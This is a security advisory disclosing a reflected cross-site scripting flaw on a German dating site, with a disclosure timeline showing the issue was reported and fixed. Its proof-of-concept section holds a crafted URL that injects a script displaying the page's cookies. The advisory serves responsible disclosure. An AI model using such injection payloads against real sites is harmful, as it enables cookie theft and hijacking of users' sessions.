Advisory:		www.friendscout24.de - Cross-site Scripting vulnerability
Advisory ID:		SSCHADV2012-025
Author:			Stefan Schurtz
Affected Software:	Successfully tested on www.friendscout24.de
Vendor URL:		http://www.friendscout24.de
Vendor Status:		informed

==========================
Vulnerability Description
==========================

http://www.friendscout24.de is prone to a XSS vulnerability

==========================
PoC-Exploit
==========================

www.friendscout24.de/iftracking.html?pagename=GUEST_LP_26674_de_partnersuche_17'"></style></script><script>alert(document.cookie)</script>&regtracking=true

==========================
Solution
==========================

-

==========================
Disclosure Timeline
==========================

23-Dec-2012 - informed by contact form
13-Feb-2013 - fixed

==========================
Credits
==========================

Vulnerability found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://www.darksecurity.de/advisories/2012/SSCHADV2012-025.txt